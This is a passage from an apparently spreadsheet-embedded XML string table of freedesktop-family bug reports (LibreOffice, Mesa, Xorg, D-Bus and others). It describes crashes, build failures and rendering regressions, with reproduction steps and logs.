  </si>
  <si>
    <t>michel.renon</t>
  </si>
  <si>
    <t>LIBREOFFICE-59973</t>
  </si>
  <si>
    <t>FILESAVE row height export to xlsx still buggy</t>
  </si>
  <si>
    <t>Created attachment 73776
test document
please see attachment a simple ods document with some different row heights ( but no cell content ) after saving to xlsx the row heights are incorrect seems like multiple unused cells are incorrectly handled. e.g.
source ods document has
row 1-5   height 5.29mm
row 6-11  height 10.58mm
row 18-22 height 17.67mm
after export ( and re-load )
row 1     height 5.29
row 2-5   height 17.67
row 6     height 10.58
row 7-11  height 17.67
row 12    height 4.52 ( calc default row height )
row 13-&gt;&gt; height 17.67
so seems the first row of each height span is set correctly the remainder of each row seems incorrect. Additionally the default row height seems set incorrectly ( possibly indicating that some more work required with Bug #55621</t>
  </si>
  <si>
    <t>CAIRO-10175</t>
  </si>
  <si>
    <t>cairo_font_face_mutex missing from cairo-win32-surface.c</t>
  </si>
  <si>
    <t>cairo_font_face_mutex was inadvertently left out of cairo-win32-surface.c .  The attached patch adds it and adds calls to InitializeCriticalSection() and DeleteCriticalSection().</t>
  </si>
  <si>
    <t>rwjj</t>
  </si>
  <si>
    <t>XCB-71418</t>
  </si>
  <si>
    <t>xcb-proto git: 'inconsistent use of tabs and spaces in indentation' breaks python3</t>
  </si>
  <si>
    <t>When trying to build libxcb with Python3.3 I'm getting:
/usr/bin/python3.3 /tmp/portage/x11-libs/libxcb-9999/work/libxcb-9999/src/c_client.py -p  /usr/share/xcb/xc_misc.xml
Traceback (most recent call last):
  File /tmp/portage/x11-libs/libxcb-9999/work/libxcb-9999/src/c_client.py line 2982 in 
    from xcbgen.state import Module
  File /usr/lib64/python3.3/site-packages/xcbgen/state.py line 7 in 
    from xcbgen import matcher
  File /usr/lib64/python3.3/site-packages/xcbgen/matcher.py line 12 in 
    from xcbgen.xtypes import *
  File /usr/lib64/python3.3/site-packages/xcbgen/xtypes.py line 82
    new_fd = Field(self module.get_type_name('INT32') fd_name True False False None True)
                                                                                               ^
TabError: inconsistent use of tabs and spaces in indentation
This is a recent regression in xcb-proto git. I suspect the tab in first comment line of make_fd_of().</t>
  </si>
  <si>
    <t>MESA-110709</t>
  </si>
  <si>
    <t>g_glxglvnddispatchfuncs.c and glxglvnd.c fail to build with clang 8.0</t>
  </si>
  <si>
    <t>Trying to build mesa 19.1.0-rc2 with clang 8.0 results in
../src/glx/g_glxglvnddispatchfuncs.c:146:47: error: passing 'const int *' to parameter of type 'int *' discards qualifiers [-Werror-Wincompatible-pointer-types-discards-qualifiers]
    ret = (*pChooseFBConfigSGIX)(dpy screen attrib_list nelements)
                                              ^~~~~~~~~~~
../src/glx/g_glxglvnddispatchfuncs.c:237:64: error: passing 'const int *' to parameter of type 'int *' discards qualifiers [-Werror-Wincompatible-pointer-types-discards-qualifiers]
    ret = (*pCreateGLXPbufferSGIX)(dpy config width height attrib_list)
                                                               ^~~~~~~~~~~
2 errors generated.
After fixing this by explicitly casting attrib_list to (int*) a similar error occurs in glxglvnd.c:
../src/glx/glxglvnd.c:44:12: error: returning 'const void *const' from a function with result type 'void *' discards qualifiers [-Werror-Wincompatible-pointer-types-discards-qualifiers]
    return __glXDispatchFunctions[internalIndex]
           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 error generated.
This too can be fixed with an explicit cast to void* -- but of course that's just hiding const-ness being thrown away.
The resulting mesa works fine.</t>
  </si>
  <si>
    <t>WOCKY-49471</t>
  </si>
  <si>
    <t>Add a WockyConnector::connection-established</t>
  </si>
  <si>
    <t>I want a way to get to the socket as early as possible to set TCP_NODELAY. This is one way of doing it.
Another way would be have a wocky_connector_set_tcp_nodelay(WockyConnector * gboolean) like Twisted does. I'm not really fussed.
wocky-connector-test is basically the only test which actually touches sockets (the rest use fake streams which just pass strings around which is good) so I set TCP_NODELAY there too which dropped the running time of all the tests from 37s to 10s. Not bad.</t>
  </si>
  <si>
    <t>TELEPATHY-27795</t>
  </si>
  <si>
    <t>Problems using Tp::SharedPtr as a key in QMap</t>
  </si>
  <si>
    <t>Created attachment 35238
patch to add operator&lt; and qHash
When you try to use a SharedPtr in a QMap as follows:
  QMap int&gt;
The compiler will happily allow you to do so.  However when running the application you'll notice some strange behavior.  note that QMap (like std::map) requires that the type used for a key have operator&lt; defined in order to determine the order of th eelements in the map.  tp-qt4 does not provide operator&lt; for SharedPtrs so the compiler looks for a suitable comparison operator and notices that SharedPtr can be implicitly converted to bool (due to the unfortunate definition of 'SharedPtr::operator bool()') and so it uses the following operator to determine element order:
  operator&lt;(bool a bool b)
So when you insert a new element into the map it will compare the new key with the old key by first converting them to booleans.  The impact of this is that any non-null sharedptr will be interpreted as being the exact same key value.  This means that the maximum number of elements in this map is 2: one non-null SharedPtr and one null SharedPtr.  A user can define an appropriate operator&lt; herslef but it's not immediately obvious that this is necessary.  It would be good if the library itself provided the comparison operator.  I'm providing a patch that adds a few comparison operators and a qHash() implementation for SharedPtr.
Note that this does not fix all of the unfortunate consequences of defining the 'operator bool()' since the following line will still happily compile despite it being quite obviously nonsense:
  int i = SharedPtr(new T())
But that's a different bug report...</t>
  </si>
  <si>
    <t>LIBREOFFICE-36534</t>
  </si>
  <si>
    <t>UI: Accept Changes dialog at minimum size sometimes hides buttons</t>
  </si>
  <si>
    <t>How to reproduce:
1. Open Accept changes dialog resize it to minimum size (the buttons are still visible)
2. Close the dialog
3. Reopen the dialog. The buttons are now invisible until the dialog is resized
I did observe this in 3.3.2 3.3.4 Beta 2 on Windows and MacOS X it probably applies to other versions and OSes as well.</t>
  </si>
  <si>
    <t>Marcel.Waldvogel</t>
  </si>
  <si>
    <t>MESA-28822</t>
  </si>
  <si>
    <t>[llvmpipe] piglit point-sprite regression</t>
  </si>
  <si>
    <t>Created attachment 36611
point-sprite.png
mesa: 172f3f5eac62fafcd0d97a9859eb2049b1e18424 (master)
$ ./bin/point-sprite
...
Probe at (1749)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 0.000000
  size = 64.000 origin = upper left
Probe at (9041)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 0.000000
  size = 32.000 origin = upper left
Probe at (15937)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 0.000000
  size = 16.000 origin = upper left
Probe at (22635)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 0.000000
  size = 8.000 origin = upper left
Probe at (29234)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 0.000000
  size = 4.000 origin = upper left
Probe at (35733)
  Expected: 0.000000 0.000000 0.000000
  Observed: 1.000000 0.000000 0.000000
  size = 2.000 origin = upper left
Probe at (17114)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 0.000000
  size = 64.000 origin = lower left
Probe at (90106)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 0.000000
  size = 32.000 origin = lower left
Probe at (159102)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 0.000000
  size = 16.000 origin = lower left
Probe at (226100)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 0.000000
  size = 8.000 origin = lower left
Probe at (29299)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 0.000000
  size = 4.000 origin = lower left
Probe at (35798)
  Expected: 1.000000 1.000000 1.000000
  Observed: 1.000000 0.000000 0.000000
  size = 2.000 origin = lower left</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-30697</t>
  </si>
  <si>
    <t>Cleanup DeviceKit git repositories</t>
  </si>
  <si>
    <t>I talked to David Zeuthen (udisks maintainer) and Richard Hughes (upower maintainer) about cleaning up the old git repositories in DeviceKit/*
Both agreed that nuking those old repositories is fine.
In detail those are:
- DeviceKit/DeviceKit.git (no valuable history)
- DeviceKit/DeviceKit-disks.git (symlink to udisks.git)
- DeviceKit/DeviceKit-power.git (upower.git contains the history)
- DeviceKit/upower.git (symlink to upower.git)
As David and Richard couldn't tell anymore for sure if DeviceKit/DeviceKit-disks.git is a symlink to udisks.git or the other way around please make sure to delete the correct one and move it around if necessary (Same for DeviceKit/upower.git)</t>
  </si>
  <si>
    <t>UDISKS-61162</t>
  </si>
  <si>
    <t>Udisks fails to mount flash drive when ACL isn't supported in kernel</t>
  </si>
  <si>
    <t>After upgrade to KDE 4.10 which now uses udisks2 in Gentoo I'm not able to mount any of flash drives.
Short investigation shows that problem lays in udisks2 hard dependency over ACL support. While it is absolutely OK to use it when it present it would be nice to have some kind of fallback for systems (or filesystems) where ACLs are not supported at all.
It seems that this could be easily fixed by attached patch.</t>
  </si>
  <si>
    <t>ostash</t>
  </si>
  <si>
    <t>TELEPATHY-76024</t>
  </si>
  <si>
    <t>[PATCH] Add 5 to pkg-config package names for Qt5</t>
  </si>
  <si>
    <t>Created attachment 95590
Adjust CMakeFile to pass the Qt version into the .pc files
Qt4 uses QtCore where Qt5 uses Qt5Core for its package name in pkg-config.</t>
  </si>
  <si>
    <t>XORG-4133</t>
  </si>
  <si>
    <t>For Linux/sparc:  Missing hw/xfree86/os-support/bus/sparcPci.c hw/xfree86/loader/SparcMulDiv.S</t>
  </si>
  <si>
    <t>For modular Xserver on linux/sparc both hw/xfree86/os-support/bus/sparcPci.c
and hw/xfree86/loader/SparcMulDiv.S (sparc assembly module) are missing but
both must be provided and built:
Symptom from missing sparcPci.c ---
./.libs/libxorgos.a(Pci.o)(.text+0x134c): In function `xf86scanpci':
: undefined reference to `sparcPciPciBridge'
Symptom from missing assembly module---
loader/libloader.a(loader.o)(.data+0x4): undefined reference to `rem_sparcv89'
loader/libloader.a(loader.o)(.data+0xc): undefined reference to `urem_sparcv89'
loader/libloader.a(loader.o)(.data+0x14): undefined reference to `mul_sparcv89'
loader/libloader.a(loader.o)(.data+0x1c): undefined reference to `umul_sparcv89'
loader/libloader.a(loader.o)(.data+0x24): undefined reference to `div_sparcv89'
loader/libloader.a(loader.o)(.data+0x2c): undefined reference to `udiv_sparcv89'
(Of course both are built conditionally only for sparc.)
Sorry to report these sparc things one or two at a time and sorry for not
providing a solution I don't know how the modular build system is handling
sparc-only assembly code.</t>
  </si>
  <si>
    <t>DBUS-77941</t>
  </si>
  <si>
    <t>`dbus-uuidgen --ensure` should try to make /var/lib/dbus-machine-id match /etc/machine-id</t>
  </si>
  <si>
    <t>Steps to reproduce:
* install systemd on a system without dbus
* run systemd-machine-id-setup if not already run by maintainer scripts
* install dbus
* run dbus-uuidgen --ensure if not already run by maintainer scripts
(In a minimal Debian chroot: apt-get install --no-install-recommends systemd apt-get install dbus. *.postinst run the relevant binaries automatically)
Expected result:
* /etc/machine-id contains 32 hex digits + \n
* /var/lib/dbus/machine-id contains exactly the same thing
Actual result:
* /etc/machine-id contains 32 hex digits + \n
* /var/lib/dbus/machine-id contains a different 32 hex digits + \n
If you do it the other way round (install dbus run dbus-uuidgen --ensure install systemd run systemd-machine-id-setup) then it works as expected: we generate a D-Bus machine ID then systemd-machine-id-setup just copies it.
Patches in a moment.</t>
  </si>
  <si>
    <t>XORG-76035</t>
  </si>
  <si>
    <t>DRI_PRIME with anything but 0 or 1 crashes X if rendering is offloaded</t>
  </si>
  <si>
    <t>This is seen with render offloading on Radeon with any Intel gfx (Nvidia not
tested)
DRI_PRIME=2 glxinfo crashes X. It happens with any program. It happens only
if rendering is offloaded. Without association the Intel gfx is accessed.</t>
  </si>
  <si>
    <t>PKG-CONFIG-34382</t>
  </si>
  <si>
    <t>Update autotools configuration</t>
  </si>
  <si>
    <t>Replace deprecated macros and use the new libtool syntax.
Also use silent rules to silence the build a bit</t>
  </si>
  <si>
    <t>MESA-83508</t>
  </si>
  <si>
    <t>[UBO] Assertion for array of blocks</t>
  </si>
  <si>
    <t>Created attachment 105763
Test case
Attached test case causes the following assertion failure.  In non-debug builds it generates a bunch of valgrind rage followed by a segfault.
shader_runner: ../../src/glsl/link_uniform_blocks.cpp:215: unsigned int link_uniform_blocks(void* gl_shader_program* gl_shader** unsigned int gl_uniform_block**): Assertion `(b-&gt;num_array_elements &gt; 0) == b-&gt;type-&gt;is_array()' failed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-57929</t>
  </si>
  <si>
    <t>Switching between absolute &amp; relative external references not possible</t>
  </si>
  <si>
    <t>Problem description: It does not work anymore to switch between absolute &amp; relative references in Calc if the reference comes from an external file. This used to work in previous versions so it is a regression. In the tested version Calc gives an error message No references found.
IMHO this is a very often used feature in spreadsheet programmes since many values may be imported from other files (e.g. financial calculations). This regression makes Calc almost useless when working with external references.
Steps to reproduce:
1. Create a new Calc spreadsheet and write the value 1 in cell A1. Save the file.
2. Create a second file
3. Type in the second file in cell A2 = and pick with the mouse the cell A1 from the first file. You will see the value of the first file in the second file. So far everything works fine. What you see is a relative reference.
4. Click in cell A2 in the second file and try to hit Shift &amp; F4. This should switch from relative references ='file:///test.ods'#$Sheet1.A1 to the absolute reference ='file:///test.ods'#$Sheet1.$A$1. This does not work anymore. You get the error message No references found.
Cross-check: This feature still works if the reference is in the same file:
5. In the second file write the value 2 in cell B1.
6. Type in the second file in cell B2 = and pick with the mouse the cell B1 in the same file. You see the value as relative reference.
7. Hit Shift &amp; F4 and you see that the relative reference switches to an absolute reference =$B$1. 
System: Ubuntu 11.10 LibreOffice 3.5.4.2  Build ID: 350m1(Build:2)</t>
  </si>
  <si>
    <t>XORG-30047</t>
  </si>
  <si>
    <t>radeon [XPRESS 200M] OpenOffice crashes X server when previewing too long footnotes</t>
  </si>
  <si>
    <t>Created attachment 38480
sample document which can cause OOo to crash (last footnote)
When hovering over a reference to a footnote a preview appears. However when
the footnote is long (&gt; 4 lines) the preview is distorted (something I can
live with) and when it is very long (7 lines or more) OpenOffice crashes
taking with it the whole X server. This happens also with a clean user
directory so no corrupted personal settings.
I just found a Ubuntu bug report: https://bugs.launchpad.net/ubuntu/+source/openoffice.org/+bug/606602. Compiz
actually reports text length exceeded. It seems to be the same issue: OOo doesn't line-break in footnote previews - if the preview is
much too long for one line OOo does _something_ which 
-in Gome with Compiz (there's no information about the graphics) crashes
Compiz
-in XFCE with Compiz and proprietary Nvidia driver leaves just an empty
tooltip
-in KDE SC with KWin and free radeon driver crashes X.
It's very annoying because in my scientific writings I have a lot of long
footnotes and every now and then OOo crashes. It took me weeks to find out the
reason.
OpenSuse 11.3 KDE SC 4.5.0 Kernel 2.6.34-12 ATI Radeon XPRESS 200M with
radeon driver
For comparison I tested OO.org on my other machine with an NVidia card: On
Windows everything is shown correctly on XFCE longer previews (from 4 lines
on) are displayed as withe fields but no crash.
I've reported this to Novell Bugzilla but for the lack of ATI Xpress hardware they can't debug it there.
I attach an example file and the debug output.</t>
  </si>
  <si>
    <t>brosch</t>
  </si>
  <si>
    <t>LIBREOFFICE-76409</t>
  </si>
  <si>
    <t>FORMATTING: content.xml data differs</t>
  </si>
  <si>
    <t>Created attachment 96115
content.xml sample outputs showing the difference bewteen 4.1 and 4.2 versions
Problem description: 
content.xml file contains different data from one LO version to the other
Steps to reproduce:
1. Create a new ods file with a number value on it (eg. 46236589998745) and give the cell a format to fit your locale (mine es_ES) so that it displays as 4624.
2. Save the file and rename it as .zip to get the raw data
3. Now tag  contains 46236589998745 instead 4624 as it hapenned on older LO versions.
Current behavior:  contains the raw/unformatted data (see attached file)
Expected behavior:  should contains the formatted data (see attached file)
Operating System: All
Version: 4.2.0.4 release
Last worked in: 4.1.1.2 release</t>
  </si>
  <si>
    <t>noelamac</t>
  </si>
  <si>
    <t>DRI-29140</t>
  </si>
  <si>
    <t>[rs690] Freeze at Xorg startup when using KMS and multiple screens</t>
  </si>
  <si>
    <t>Created attachment 37174
Complete dmesg (radeon module loaded just after the last line speaking about a segfault of glxinfo)
Hello
I have an ATI Radeon X1270 card (rs690m) with 128 Mio of sideport memory and 256 Mio of shared RAM. This memory configuration caused the bug #27529 .
I use the 2.6.35-rc5 kernel (linus-tree) Mesa git (as of the 17th of July 2010 commit 184abe8e26f76a50ede43d503aa6bf129d8d6b76 llvmpipe: Remove unused variable in lp_test_sincos.) libdrm git (as of the first of July 2010 commit b803918f3f77c62edf22e78cb2095be399753423 drm mode: Return -errno on drmIoctl() failure) and xf86-video-ati git (as of the 15th of July commit cdeb1949c820242f05a8897d3ddd0718f204dacf kms: don't call cursor helper if using software cursor).
Because of the bug #27529 I used to boot my netbook with the radeon.modeset=0 param to avoir screen corruptions.
Then I went to vacations. When I returned back to home I wanted to try the latest versions of all my favorite softwares especially the shiny new kernel containing the fix of #27529.
I updated all my software stack to the versions I mentionned in the second paragraph changed radeon.modeset=0 to radeon.modeset=1 and rebooted.
The reboot was ok. All my services started up nicely except KDM. When the X server attempts to start the screen goes black with a small text cursor at its top left corner. This cursor doesn't move or blinks. The computer doesn't go farther in the boot sequence it freezes.
I rebooted using the nomodeset option and killed KDM (which started fine). I launched a small shell loop that continuously write the dmesg output in a file and launched it.
While it was running I unloaded the radeon module and reloaded it with the modeset=1 parameter. All went fine my screen was ok with my text console on it. Then I restarted KDM which attempted to start Xorg.
The same bug came again. During the freeze I was able to see the activity of my hard disk drive (the dmesg loop contains a sync). It makes me thinking that the computer is not hard frozen only the graphical part. I cannot go to any virtual console at this point and I rebooted.
I attached my complete dmesg as captured by my small script.
Thanks for resolving this bug I hope it is the last one I will see before having a nice KMS-enabled netbook and being able to give a try to Gallium3D which is needed to a have the very nice Blur effect of KWin on my hardware.</t>
  </si>
  <si>
    <t>steckdenis</t>
  </si>
  <si>
    <t>BEIGNET-89378</t>
  </si>
  <si>
    <t>OpenCL kernel build crash using Blender Cycles</t>
  </si>
  <si>
    <t>Following on from bug 89325 a second unrelated crash happens when trying to use Blender Cycles renderer with Beignet:
&gt;&gt; following is the output I see on the command line when I try to render the
&gt;&gt; default blender scene (just a cube) using the Cycles Renderer :
&gt;&gt; 
&gt;&gt; [arpie@max build]$ CYCLES_OPENCL_TEST=true blender
&gt;&gt; Read new prefs: /home/arpie/.config/blender/2.73/config/userpref.blend
&gt;&gt; Device init succes
&gt;&gt; Compiling OpenCL kernel ...
&gt;&gt;   %132 = load i32 addrspace(2)* %131 align 4 !tbaa !54
&gt;&gt; Illegal pointer which is not from a valid memory space.
&gt;&gt; Aborting...
&gt;
&gt;I can't reproduce this. Could you tell me the LLVM/Clang version you are using? &gt;You can get it by execute:
&gt;llvm-config --version.
Here you go:
[arpie@max ~]$ llvm-config --version
3.5.1
&gt;&gt; Equally do you think it is too ambitious to be trying to get this to work
&gt;&gt; at all?  I suspect the speed up I will get will be minimal (if any at all)
&gt;&gt; as I am not exactly using a high-spec GPU.  In fact that might be the cause
&gt;&gt; of the crash - not enough memory available on the GPU?  But that is just a
&gt;&gt; naive guess!  I should stop speculating and leave it to the experts...
&gt;
&gt;To support blender's CYCLE engine is a little bit ambitious due to its very &gt;large computing kernel. But we will continue to improve beignet to support it &gt;eventually.
&gt;
&gt;Don't know which GPU are you using if you are using a HSW GT3 then if we can &gt;get blender work with beignet it should give noticeable performance boost. If &gt;you are using IVB GT1 or HSW GT1 then it may not worth to enable GPU &gt;acceleration. 
I'm using some sort of integrated graphics in a laptop.  The only info I can give you is this :
GPU : 00:02.0 VGA compatible controller [0300]: Intel Corporation 4th Gen Core Processor Integrated Graphics Controller [8086:0416] (rev 06)
That series/model id looks like a (from a google search) :
 Haswell Integrated Graphics Controller
or
 4th Gen Core Processor Integrated Graphics Controller
The motherboard is is a W54_55SU1 SUW if that helps at all.
Is there a command I can run to get you more useful info on the GPU?
Other useful info includes :
OS: Arch Linux 3.18.6-1-ARCH #1 SMP PREEMPT Sat Feb 7 08:44:05 CET 2015 x86_64 GNU/Linux
Blender version 2.73
Beignet version 1.0.1
Good luck
Russell</t>
  </si>
  <si>
    <t>ruiling.song</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-90774</t>
  </si>
  <si>
    <t>Created attachment 116155
GPG public key
For Google Summer of Code 2015 project 'OpenCL image support for the r600 gallium driver'.</t>
  </si>
  <si>
    <t>zoltan.gilian</t>
  </si>
  <si>
    <t>DRI-94696</t>
  </si>
  <si>
    <t>[BSW] igt / gem_reloc_vs_gpu / forked-*-hang fail</t>
  </si>
  <si>
    <t>Created attachment 122551
BSW-gem_reloc_vs_gpu-forked-*-hang_kern.log
Hardware: 
Motherboard: Aspire XC-704 
cpu model name : Intel(R) Pentium(R) CPU N3700 @ 1.60GHz 
cpu model : 76 
cpu family : 6 
Graphic card: Device 22b1 (rev 21)
Software:
Bios: R01-A2
kernel nightly 4.5 10e913a  from https://cgit.freedesktop.org/cgit/?url=drm-intel/
  commit 10e913a48ca36790da9b58bed8729598ea79ebdb
  Author: Imre Deak 
  Date:   Thu Mar 17 15:23:17 2016 +0200
  drm-intel-nightly: 2016y-03m-17d-13h-22m-41s UTC integration manifest
cairo 1.15.2 db8a7f1 from git://anongit.freedesktop.org/cairo
libdrm-2.4.67-7 49041c3 from git://anongit.freedesktop.org/mesa/drm
IGT 1.14 8f6ed9e from http://anongit.freedesktop.org/git/xorg/app/intel-gpu-tools.git
Steps:
-------
1. Execute IGT tests:
igt@gem_reloc_vs_gpu@forked-faulting-reloc-hang
igt@gem_reloc_vs_gpu@forked-hang
igt@gem_reloc_vs_gpu@forked-interruptible-faulting-reloc-hang
igt@gem_reloc_vs_gpu@forked-interruptible-hang
igt@gem_reloc_vs_gpu@forked-interruptible-thrash-inactive-hang
Actual results
--------------
1. Tests are fail
Expected results
-----------------
1. Tests are pass</t>
  </si>
  <si>
    <t>GALAGO-2665</t>
  </si>
  <si>
    <t>libgalago</t>
  </si>
  <si>
    <t>autogen.sh produces errors</t>
  </si>
  <si>
    <t>I just did a clean svn co and received the following errors while running autogen.sh
Generating configuration files for libgalago please wait...
Running gettextize please ignore non-fatal messages....
Creating directory m4
Copying file m4/codeset.m4
Copying file m4/gettext.m4
Copying file m4/glibc21.m4
Copying file m4/iconv.m4
Copying file m4/isc-posix.m4
Copying file m4/lcmessage.m4
Copying file m4/progtest.m4
./setup-gettext: line 182: test: -ge: unary operator expected</t>
  </si>
  <si>
    <t>goern</t>
  </si>
  <si>
    <t>LIBREOFFICE-64671</t>
  </si>
  <si>
    <t>FILESAVE: Documents containing Å½ are mangled in RTF format</t>
  </si>
  <si>
    <t>Created attachment 79418
example broken file
Problem description: 
Å½ is a standard Czech character. But if I save text containing this character in RTF format and open the document again the text is mangled - usually an extra } character appears after Å½.
This problem only affects RTF format. In DOC or ODT everything works fine.
I have verified this problem on two different computers both running Fedora 18.
libreoffice-writer-3.6.6.2-5.fc18.x86_64
Steps to reproduce:
1. Create an empty document and save it as file.rtf. Close Writer. This step is necessary not sure why.
2. Open file.rtf and type in Å½. Save and close Writer.
3. Open file.rtf and see that it contains Å½} or similar.
Current behavior:
For every Å½ an extra character is added sometimes replacing other character. For example Å½idenice can become Å½}denice.
Expected behavior:
No text mangling
Operating System: Fedora
Version: 3.6.6.2 release</t>
  </si>
  <si>
    <t>kamil.paral</t>
  </si>
  <si>
    <t>LIBREOFFICE-41068</t>
  </si>
  <si>
    <t>DOCX import: image wrapping polygon wrongly imported causes embedded image to be partially obscured</t>
  </si>
  <si>
    <t>Created attachment 51447
Screenshot of Libreoffice not displaying a complete image juxtaposed with OpenOffice.org 3.2's (reference) rendering
With the same document as attached to Bug #41013 the spiral-esque image is only partially displayed.  Attached are two screenshots (merged into one image) of what is displayed and a reference image.  Note that the partial image is also what is sent to the printer.</t>
  </si>
  <si>
    <t>hunteke</t>
  </si>
  <si>
    <t>XORG-73943</t>
  </si>
  <si>
    <t>[snb i915] DP Flicker</t>
  </si>
  <si>
    <t>Hello
I'm currently experiencing an issue where my two display port driven screens flicker randomly. At first I thought this was a kernel driver issue but as the kernel modules have progress I'm thinking less so.
I'm currently working through a FIFI underrun here:
https://bugs.freedesktop.org/show_bug.cgi?id=70254
However I've noticed that my screen blanks no longer accurately correlate with the [drm:ilk_display_irq_handler] Pipe X FIFO underrun logs that are being spit out.
I can have many screen flickers but nothing is output in the logs which leads be to believe the error is somewhere higher in the stack.
My hardware is a lenovo X220 with a sandybridge era i7.
# uname -a
Linux rnavarro-thinkpad 3.13.0-994-generic #201401210405 SMP Tue Jan 21 09:05:52 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
I'm currently running on ubuntu 13.10 with the latest 3.13 mainline kernel and packages from the xorg-edgers PPA which includes xserver-xorg-video-intel at 2:2.99.907+git20140117.f23ab963-0ubuntu0sarvatt~saucy
I'm attaching a few logs but any assistance in helping me track down this flicker would be great!
Let me know what other information is required.</t>
  </si>
  <si>
    <t>crshman</t>
  </si>
  <si>
    <t>MESA-38403</t>
  </si>
  <si>
    <t>Vertex arrays with more than 65532 vertices are not fully rendered.</t>
  </si>
  <si>
    <t>Hello
I have rendering problems when I try to display more then 65532 vertices with my Radeon X600.
I attached the apitrace file http://www.quickfilepost.com/done.do?get=4f69f193a4cd2ef1b5e8372a824317d2&amp;tb=.
You can see the patch here http://paste.pocoo.org/show/410186/ and the screenshot here http://www.quickfilepost.com/done.do?get=72e61088b58f7fb7b11781a47381b3f6&amp;tb=.
Thanks.</t>
  </si>
  <si>
    <t>samuel.pitoiset</t>
  </si>
  <si>
    <t>PKG-CONFIG-41081</t>
  </si>
  <si>
    <t>pkg-config wont install</t>
  </si>
  <si>
    <t>I installed gettext (something JHBuild should have done) and
JHBuild still didn't find it.
I told JHBuild to ignore the module. Then it had a problem with Cairo.
I installed pkg-config (something JHBuild should have done) but it wanted glib.
I installed glib(something JHBuild should have done) but it wanted pkg-config.
GLIB INSTALL file says:
GLib-2.0 requires pkg-config which is tool for tracking the
compilation flags needed for libraries
But pkg-config doesn't work.
configure: error: pkg-config and glib-2.0 not found please set GLIB_CFLAGS and GLIB_LIBS to the correct values
In the INSTALL file there is nothing to explain WHAT values GLIB_CFLAGS and GLIB_LIBS
should be set to or HOW to set those flags.
Here is a question:
If users know SO MUCH about terminal configuration shells and installs 
how come they are just NOW downloading GTK?
Who is your audience someone who has been programming 20 years?
configure: error: pkg-config &gt;=  required but not found (http://pkgconfig.freedesktop.org/)
*** Error during phase configure of cairo: ########## Error running ./configure --prefix /Users/jacobisrael/gtk/inst --libdir '/Users/jacobisrael/gtk/inst/lib' --enable-pdf --enable-quartz --enable-xlib=no --without-x   *** [18/24]
I have a MacBook OSX 10.4 Dual Intel Core
All I wanted was to make some graphics with C++.
So maybe you could just tell me how to get C++ to talk to X11.
Then I can give up on GTK.
Thank you
Mr. Israel</t>
  </si>
  <si>
    <t>americancafe</t>
  </si>
  <si>
    <t>DRI-107724</t>
  </si>
  <si>
    <t>[CI] [BAT] [DRMTIP] igt@* - dmesg-warn / dmesg-fail - *ERROR* CPU pipe [ABC] FIFO underrun</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_plane_lowres@pipe-a-tiling-y.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_vblank@pipe-b-ts-continuation-modeset-hang.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_flip@wf_vblank-ts-check-interruptible.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_plane_lowres@pipe-b-tiling-x.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_flip@busy-flip.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_vblank@pipe-b-query-idle.html
https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_95/fi-icl-u/igt@kms_ccs@pipe-a-crc-primary-rotation-180.html
[  214.128456] [drm:intel_cpu_fifo_underrun_irq_handler [i915]] *ERROR* CPU pipe C FIFO underrun
[  224.735148] asynchronous wait on fence i915:kms_busy[1456]/0:1 timed out</t>
  </si>
  <si>
    <t>LIBREOFFICE-67128</t>
  </si>
  <si>
    <t>Auto Filter Sort Results in Crash</t>
  </si>
  <si>
    <t>Created attachment 82759
File Demonstrating Problem
Version: 4.2 master
Build Date: Thu Jul 18 14:51:17 2013 +0200
Reproducible Steps:
1. Open Attached File
2. Select entire sheet (UNFORMAT)
3. Data -&gt; Filter -&gt; Auto Filter
4. Go to Column X
5. Sort
Expected: Sort happens
Observed: Crash
Works fine on 4.1 RC3</t>
  </si>
  <si>
    <t>GEOCLUE-26649</t>
  </si>
  <si>
    <t>disable plazes if it gives unuseful results.</t>
  </si>
  <si>
    <t>Hi
Let's say I have plazes and hostip providers installed.
But unfortunately plazes does not povides me useful results. plazes send me a xml document with just en empty  tag.
So it would be nice to disable plazes when result is unuseful therefore geoclue could try to get results from hostip.</t>
  </si>
  <si>
    <t>MESA-19361</t>
  </si>
  <si>
    <t>[G45] Rendering problems in Sauerbraten</t>
  </si>
  <si>
    <t>The Sauerbraten game has rendering errors. Walls and floors frequently turn completely invisible and at other times fails to redraw. I hope the attached screenshot is enough to demonstrate the problem.
This does not happen when running Mesa with the software rasterizer. 
This bug is not present with Mesa 7.2 but with this version the game is running quite slow so I guess it could be due to it using software fallbacks?
http://sauerbraten.org/
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- xf86-video-intel: d8e89b26ef5ef2c15e5d34162b14d279a7f0bb1c
-- xserver: 1.5.2
-- mesa: bfebeffc0045266d354a36968336337e099a9f27
-- drm: 0243c9f801a35de3465a0321c02f18a4d07ce5b8
-- kernel: drm-intel-2.6.28 72e2bfb03f46f7eef1ae8907593dd35e2c5603de</t>
  </si>
  <si>
    <t>MESA-111251</t>
  </si>
